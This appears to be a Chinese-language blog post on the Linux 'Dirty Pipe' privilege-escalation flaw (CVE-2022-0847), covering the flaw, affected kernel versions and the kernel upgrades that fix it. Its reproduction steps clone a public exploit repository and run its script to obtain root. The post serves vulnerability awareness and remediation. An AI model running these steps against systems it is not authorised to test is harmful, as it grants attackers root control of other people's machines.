漏洞描述
CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件(甚至是只读文件)中的数据,从而可将普通权限的用户提升到root权限。
CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为Dirty Pipe。
影响版本
影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
复现步骤
kali机复现,版本(Linux kali 5.14.0-kali4-amd64 #1 SMP Debian 5.14.16-1kali1 (2021-11-05) x86_64 GNU/Linux)
git clone https://github.com/imfiver/CVE-2022-0847.git

cd CVE-2022-0847

chmod +x Dirty-Pipe.sh

bash Dirty-Pipe.sh

whoami
直接就是root权限
漏洞修复
更新升级 Linux 内核到以下安全版本:
Linux 内核 >= 5.16.11
Linux 内核 >= 5.15.25
Linux 内核 >= 5.10.102
本文介绍了CVE-2022-0847 DirtyPipe漏洞,这是一个影响Linux内核5.8及后续版本的本地提权漏洞。攻击者能覆盖并重写文件内容,从而获得root权限。该漏洞与DirtyCow类似但更易利用。受影响的版本包括5.8到5.16.11/5.15.25/5.10.102。修复措施是升级到安全版本的Linux内核。复现步骤包括在Kali Linux上运行提供的exploit脚本,执行后即可获得root权限。
2407

被折叠的 条评论
为什么被折叠?



